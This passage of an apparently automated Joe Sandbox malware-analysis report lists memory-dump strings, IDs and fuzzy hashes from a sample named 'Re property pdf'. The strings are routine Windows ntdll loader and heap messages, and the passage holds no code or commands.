                                                                                                                              • API String ID: 0-161242083
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-1334570610
                                                                                                                              Strings
                                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 010782DE
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 010782E8
                                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 010782D7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-1783798831
                                                                                                                              Strings
                                                                                                                              • @, xrefs: 010BC1F1
                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010BC1C5
                                                                                                                              • PreferredUILanguages, xrefs: 010BC212
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                              • API String ID: 0-2968386058
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                              • API String ID: 0-1373925480
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01084899
                                                                                                                              • LdrpCheckRedirection, xrefs: 0108488F
                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01084888
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                              • API String ID: 0-3154609507
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-2558761708
                                                                                                                              Strings
                                                                                                                              • LdrpInitializationFailure, xrefs: 010820FA
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 010820F3
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01082104
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0100AA13
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0100AA25
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 01000540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0100063D
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0100A309
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0100A2FB
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: b5c5eead854beae4d7d8ba4d2e3f3754bc9b6649e7548d5a79dfb6ab654c7077
                                                                                                                              • Instruction ID: 8c5c58e9b590216e71c24f3cd71d019f80ca214374636bb5cc73a19ba423c346
                                                                                                                              • Opcode Fuzzy Hash: b5c5eead854beae4d7d8ba4d2e3f3754bc9b6649e7548d5a79dfb6ab654c7077
                                                                                                                              • Instruction Fuzzy Hash: 09417F72508312ABE712DA75C844BAFBBE8BF88B14F440969FAC4D7184E678D9048792
Strings
Memory Dump Source
• Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
Similarity
• API ID:
• String ID: BinaryHash
Strings
Memory Dump Source
• Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
Similarity
• API ID:
• String ID: #
Strings
Memory Dump Source
• Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
Similarity
• API ID:
• String ID: BinaryName
Strings
• AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0108895E
Memory Dump Source
• Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
Similarity
• API ID:
• String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d4fff823bdb8efd4a03d881737ed402001bb1001b35950c6dcc9694f140e2aa
                                                                                                                              • Instruction ID: 127f09d5af9d048ced3e9436a62ac418e1a1bba01848cf7e1cd1bcfa2bb80312
                                                                                                                              • Opcode Fuzzy Hash: 0d4fff823bdb8efd4a03d881737ed402001bb1001b35950c6dcc9694f140e2aa
                                                                                                                              • Instruction Fuzzy Hash: 63C168705083418FE765CF18C494BABB7E9BF88304F44896EE9C987291DB75E909CF92
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 16aa87341139eb52a930c8dd15d389171b9871c7e87094294871f491c9ea89e3
                                                                                                                              • Instruction ID: 97329ef37a7aac48bfd643fd2af5f99fd4a6491e113ee69778e3b0c966c036ee
                                                                                                                              • Opcode Fuzzy Hash: 16aa87341139eb52a930c8dd15d389171b9871c7e87094294871f491c9ea89e3
                                                                                                                              • Instruction Fuzzy Hash: 25B19170A0026D8BDB64CF54C980BB9B3F1EF44710F1885E9D94AE7291EB34AD85DB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 715aa1733557fbc9e74454d95fb44028601ed774a802aff430c3d5718b631733
                                                                                                                              • Instruction ID: 6120d8ab2824bc8f3a38748be2938a51be78ab0033e8a510031d34a8d976efb8
                                                                                                                              • Opcode Fuzzy Hash: 715aa1733557fbc9e74454d95fb44028601ed774a802aff430c3d5718b631733
                                                                                                                              • Instruction Fuzzy Hash: 6CA14A31E4062A9FEB31DB58D958BAE7BE8BF04754F0401A5EAC0AB281C7749C40CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 67d6aa4819cb7111db5d1ca962ff4c89c7510be578458338c8ba5a23ff540296
                                                                                                                              • Instruction ID: ee098c718968c46ed898855786cfba40d2e9748d7118a6956b17a7cf61cc1f52
                                                                                                                              • Opcode Fuzzy Hash: 67d6aa4819cb7111db5d1ca962ff4c89c7510be578458338c8ba5a23ff540296
                                                                                                                              • Instruction Fuzzy Hash: E7A1AFB0B0061A9BDB25DF69C9D0BEAB7F5FF44314F004179EB85AB285DB34A851CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4d0a01b6ec4f201845326da8b5c5a951d171d92961ba04f734fa3c5c16c0d149
                                                                                                                              • Instruction ID: a1aaf693964222f8f9ca969784a8599a11d1bfc25b19acc3b903ae839b526033
                                                                                                                              • Opcode Fuzzy Hash: 4d0a01b6ec4f201845326da8b5c5a951d171d92961ba04f734fa3c5c16c0d149
                                                                                                                              • Instruction Fuzzy Hash: A4A1CA72A00712AFC722DF18C981BAABBE9FF48344F45056CE5C9DBA55D738E801CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction ID: 434d5c0cae86f75b22fc3249c5c6d1db2217f2fc622844d3ceaaeefb898c87fe
                                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction Fuzzy Hash: 85B15771E0061ADFDF69DFA9C880AADBBF5FF48310F148169E994AB354D730A941CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 80b60601e67bcb397e8825124da3fced387da76db0a52f7e2190df1eb12326ac
                                                                                                                              • Instruction ID: 49867151519dfec2a3ccd9dad02be8d3eb3ded280de0ce134ab40b4816024eb4
                                                                                                                              • Opcode Fuzzy Hash: 80b60601e67bcb397e8825124da3fced387da76db0a52f7e2190df1eb12326ac
                                                                                                                              • Instruction Fuzzy Hash: 0D91C471D04615AFDF15DFA8D884BAEBFF5AF48310F164199E6C0AB341D776D9008BA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b5a99ba36181a9a42a022d12d4311595dc7483259cb8195dfe0ebd62d020d53
                                                                                                                              • Instruction ID: 19a8cc5e139af113a98414b74deffbdca78bd2adf31e3627bacd54580ffeb9e6
                                                                                                                              • Opcode Fuzzy Hash: 7b5a99ba36181a9a42a022d12d4311595dc7483259cb8195dfe0ebd62d020d53
                                                                                                                              • Instruction Fuzzy Hash: C1914531A00612CFEB26DB5CC440BBEBBE5EF84714F1540A9EDC59B688EB39D941C7A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction ID: b982a6617feb24e4018369fd5a2c6e14c27f7ad6f11b97996ef4b6cdcda12686
                                                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                              • Instruction Fuzzy Hash: B2815E31B00209DFDB59DF98C880AAEBBF6AF84710B18856DD9569B345EA34E901CF50
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b78b4ff5d19a00ac4b3c646587206d71f26d2b3fd9c5b7d631afdd9e7e9e4f6
                                                                                                                              • Instruction ID: 4301155f6b4dd84c26ed0eb1adcc9115485b3e4a3eec0b627c3eafa5c66fda98
                                                                                                                              • Opcode Fuzzy Hash: 9b78b4ff5d19a00ac4b3c646587206d71f26d2b3fd9c5b7d631afdd9e7e9e4f6
                                                                                                                              • Instruction Fuzzy Hash: D3817471A00609EFDB65CFA9C880BEEBBF9FF88354F148529E595A7250D730AC45CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2d764da4bbe229d6cf1ec43849ffd7fa4f01b39561c45c697d8371429df092e7
                                                                                                                              • Instruction ID: c27736c6d156cf1b8dbac2a965fcc44ee8e07d2603fd038c44290c4a678e952b
                                                                                                                              • Opcode Fuzzy Hash: 2d764da4bbe229d6cf1ec43849ffd7fa4f01b39561c45c697d8371429df092e7
                                                                                                                              • Instruction Fuzzy Hash: 8471DF75C04225DFDB258F58D9907BEBBF4FF58710F14815AE982AB354D3799800CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebd8666a7710e45949ad7c7d51d9d869867c0a0cb3e083d3a0d02f6fd8a14117
                                                                                                                              • Instruction ID: e1b05d167e7416c2dd3d93ac8f7edd499c5f9f5cb189b3db870f89feff38160b
                                                                                                                              • Opcode Fuzzy Hash: ebd8666a7710e45949ad7c7d51d9d869867c0a0cb3e083d3a0d02f6fd8a14117
                                                                                                                              • Instruction Fuzzy Hash: 6C718270D00205EFDB20DFA9D981ADABBF8EF94300B11419EE6D1E769AC7369A40CB54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 005ab1d90c54bd15e5e1864127ffdcd2ddf824ee046a1173b727a3a89d8ae7ad
                                                                                                                              • Instruction ID: b562b6af808b0409a35a3a12eb39ef5b2b84a41ffa0a1284d421fb909e79539e
                                                                                                                              • Opcode Fuzzy Hash: 005ab1d90c54bd15e5e1864127ffdcd2ddf824ee046a1173b727a3a89d8ae7ad
                                                                                                                              • Instruction Fuzzy Hash: E271C1716046428FD356DF28C480B6AB7E5FF88310F1485A9E8D9CB39ADB38DC45CB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction ID: 23480cbcdf9ab942be5c515ba56f7652ae479f9b230a696830a5205b3cf75e71
                                                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                              • Instruction Fuzzy Hash: F2718071A00619EFCB10EFA9C984EDEBBB9FF48310F104569E585AB254DB34EA05CB60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 74f013810813017c997f88d4b8cf22ddf79798bc7c2a5865a39c16039847c779
                                                                                                                              • Instruction ID: bd3194ab9da060b46104d9ff900231d01b1d8ff6f94dbbd7438cb6d1f75bc57e
                                                                                                                              • Opcode Fuzzy Hash: 74f013810813017c997f88d4b8cf22ddf79798bc7c2a5865a39c16039847c779
                                                                                                                              • Instruction Fuzzy Hash: 43417375A0022D9FDB62EF68C940FEEB7B4EF45750F0100A5E988AB285D7749E84CF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: 7912f60c03801e17340b79a368ab7184144bfe9b80f18aa030385099c7ddc9c8
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: E7419575B00105ABDB15DB99CC84AEFBBBABF88A10F14806EE584A7341D770DD008B64
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a137e3fed5f8bc00f2fc815da397803e10cad20cd1d50e5e34fbae79e796c71c
                                                                                                                              • Instruction ID: 9a38efc781c7b37ea7297abc2f8a405d1c4546203102d65203bb759bc8325fd8
                                                                                                                              • Opcode Fuzzy Hash: a137e3fed5f8bc00f2fc815da397803e10cad20cd1d50e5e34fbae79e796c71c
                                                                                                                              • Instruction Fuzzy Hash: 5A41B2706007029FE326CF28C480A66B7F5FF49354F104A6EE5C786A94EB35E945CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cd54507efded961e176ed21e8c83abe470f77a898cb2fe9fea56746d9e728db2
                                                                                                                              • Instruction ID: 9cb1eff06a49cc47b585586be8ff8bd46451f07fa5f465c4e0db39e852bea18a
                                                                                                                              • Opcode Fuzzy Hash: cd54507efded961e176ed21e8c83abe470f77a898cb2fe9fea56746d9e728db2
                                                                                                                              • Instruction Fuzzy Hash: 2541D331A41224CFDB21DF68C8857EF7BB4FB54320F1401A9D891ABA95DF39D944CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 77fb771037b5ba0194bd0df5f9030f1ee6af4f3adf41e8c555493a4987a42475
                                                                                                                              • Instruction ID: a28ec64f67acc46f2a1af2b2b89617a1ec216264581168cdc4297885f96487b8
                                                                                                                              • Opcode Fuzzy Hash: 77fb771037b5ba0194bd0df5f9030f1ee6af4f3adf41e8c555493a4987a42475
                                                                                                                              • Instruction Fuzzy Hash: 2641F231E00216CBE7269F48C881AAFBBB5FB94704F14C12FD9859B695C77A9842CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 397832cc177c41a999de58d4bfd685add1c2573499f6684f187c54009a1d3dda
                                                                                                                              • Instruction ID: 67a38517448af761192371b2e1f9a4fd673b1e3991189b2ff1c5cde20625bebd
                                                                                                                              • Opcode Fuzzy Hash: 397832cc177c41a999de58d4bfd685add1c2573499f6684f187c54009a1d3dda
                                                                                                                              • Instruction Fuzzy Hash: 8141603250831A9ED321DF55C840A7BB7E9FF84B94F40092AFA80D7160E771DE059B93
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction ID: 000dafed21d6a29d9d4b31361726a585c19c185c70570d0dfe75945a065a29a7
                                                                                                                              • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                              • Instruction Fuzzy Hash: 1E416072A00219EFDB51DF18D4407BFB7B2EF50714F1580AAEE898B250DA37AD40EB91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bcf6e582deee04f84c893cf5965f5a40b0c0e1a9bda71947024ab0663169b570
                                                                                                                              • Instruction ID: 052228f0975c9c9ff6d28d9bba5a40ffbc16260f14d2246691ec51a657895e23
                                                                                                                              • Opcode Fuzzy Hash: bcf6e582deee04f84c893cf5965f5a40b0c0e1a9bda71947024ab0663169b570
